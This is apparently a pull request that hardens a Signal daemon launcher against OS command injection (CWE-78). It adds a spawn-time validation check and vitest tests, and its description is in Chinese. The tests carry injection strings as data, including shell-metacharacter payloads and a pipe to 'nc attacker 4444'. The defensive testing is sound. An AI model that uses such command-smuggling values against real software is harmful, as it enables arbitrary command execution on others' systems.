### PR TITLE
fix(signal): validate cliPath at spawn time for defense-in-depth (CWE-78)

### DIFF
--- a/src/signal/daemon.security.test.ts
+++ b/src/signal/daemon.security.test.ts
@@ -1,0 +1,70 @@
+import { describe, expect, it, vi } from "vitest";
+import { spawnSignalDaemon } from "./daemon.js";
+
+vi.mock("node:child_process", () => ({
+  spawn: vi.fn(() => {
+    const noop = { on: vi.fn(), once: vi.fn() };
+    return {
+      pid: 1234,
+      stdout: noop,
+      stderr: noop,
+      on: vi.fn(),
+      once: vi.fn(),
+      killed: false,
+      kill: vi.fn(),
+    };
+  }),
+}));
+
+const baseOpts = {
+  httpHost: "127.0.0.1",
+  httpPort: 8080,
+};
+
+describe("CWE-78: OS command injection via signal cliPath", () => {
+  it("should reject cliPath with shell metacharacters ;", () => {
+    expect(() => spawnSignalDaemon({ ...baseOpts, cliPath: "signal-cli; whoami" })).toThrow(
+      /not a safe executable value/,
+    );
+  });
+
+  it("should reject cliPath with command substitution $()", () => {
+    expect(() => spawnSignalDaemon({ ...baseOpts, cliPath: "$(malicious)" })).toThrow(
+      /not a safe executable value/,
+    );
+  });
+
+  it("should reject cliPath with backtick substitution", () => {
+    expect(() => spawnSignalDaemon({ ...baseOpts, cliPath: "`id`" })).toThrow(
+      /not a safe executable value/,
+    );
+  });
+
+  it("should reject cliPath with pipe operator", () => {
+    expect(() =>
+      spawnSignalDaemon({ ...baseOpts, cliPath: "signal-cli | nc attacker 4444" }),
+    ).toThrow(/not a safe executable value/);
+  });
+
+  it("should reject cliPath starting with -", () => {
+    expect(() => spawnSignalDaemon({ ...baseOpts, cliPath: "--malicious-flag" })).toThrow(
+      /not a safe executable value/,
+    );
+  });
+
+  it("should accept valid bare command name", () => {
+    expect(() => spawnSignalDaemon({ ...baseOpts, cliPath: "signal-cli" })).not.toThrow();
+  });
+
+  it("should accept valid absolute path", () => {
+    expect(() =>
+      spawnSignalDaemon({ ...baseOpts, cliPath: "/usr/local/bin/signal-cli" }),
+    ).not.toThrow();
+  });
+
+  it("should accept valid Windows path", () => {
+    expect(() =>
+      spawnSignalDaemon({ ...baseOpts, cliPath: "C:\\Program Files\\signal-cli\\signal-cli.exe" }),
+    ).not.toThrow();
+  });
+});

--- a/src/signal/daemon.ts
+++ b/src/signal/daemon.ts
@@ -1,4 +1,5 @@
 import { spawn } from "node:child_process";
+import { isSafeExecutableValue } from "../infra/exec-safety.js";
 import type { RuntimeEnv } from "../runtime.js";
 
 export type SignalDaemonOpts = {
@@ -89,6 +90,11 @@ function buildDaemonArgs(opts: SignalDaemonOpts): string[] {
 }
 
 export function spawnSignalDaemon(opts: SignalDaemonOpts): SignalDaemonHandle {
+  // Defense-in-depth: validate cliPath at spawn time to prevent OS command
+  // injection even if config-time validation is bypassed (CWE-78).
+  if (!isSafeExecutableValue(opts.cliPath)) {
+    throw new Error(`Refused to spawn signal daemon: cliPath is not a safe executable value`);
+  }
   const args = buildDaemonArgs(opts);
   const child = spawn(opts.cliPath, args, {
     stdio: ["ignore", "pipe", "pipe"],


### PR DESCRIPTION
## Summary
修复 signal 模块中 cliPath 配置项直接作为 spawn 执行目标的 OS 命令注入问题 (CWE-78)

## Vulnerability
- **CWE**: CWE-78
- **File**: `src/signal/daemon.ts:91-93`
- **Severity**: High
- **Impact**: cliPath 直接传入 spawn()，若绕过配置时校验可执行任意命令

## Fix
在 spawn 调用前使用 isSafeExecutableValue() 进行运行时校验，提供纵深防御。

## Checklist
- [x] POC 测试用例: 修复前 FAIL，修复后 PASS
- [x] 正常输入回归测试 PASS
- [x] 全量模块测试通过 (111 tests)
- [x] 无引入新安全问题

## AI Disclosure
- [x] AI-assisted (Claude)
- [x] 测试程度: POC 验证 + 模块全量测试通过